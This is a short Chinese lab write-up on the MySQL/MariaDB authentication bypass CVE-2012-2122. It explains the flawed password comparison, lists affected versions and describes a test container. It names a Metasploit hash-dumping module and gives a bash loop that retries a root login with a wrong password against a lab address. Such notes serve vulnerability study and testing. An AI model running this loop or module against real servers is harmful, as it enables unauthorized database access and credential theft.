Mysql⾝份认证绕过漏洞(CVE-2012-2122)
参考连接:
当连接MariaDB/MySQL时,输⼊的密码会与期望的正确密码⽐较,由于不正确的处理,会导致即便是memcmp()返回⼀个⾮零值,也会使MySQL认为两个密码是相同的。 也就是说只要知道⽤户名,不断尝试就能够直接登⼊SQL数据库。按照公告说法⼤约256次就能够蒙对⼀次。⽽且漏洞利⽤⼯具已经出现
cve漏洞库
受影响版本:
MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not.
MySQL versions from 5.1.63, 5.5.24, 5.6.6 are not.
环境启动后,将启动⼀个Mysql服务(版本:5.5.23),监听3306端⼝,通过正常的Mysql客户端,可以直接登录的,正确root密码是123456。
使⽤msf扫描模块
auxiliary/scanner/mysql/mysql_authbypass_hashdump
或者
for i in `seq 1 1000`; do mysql -u root --password=bad -h 192.168.230.131 2>/dev/null; done

版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系QQ:729038198,我们将在24小时内删除。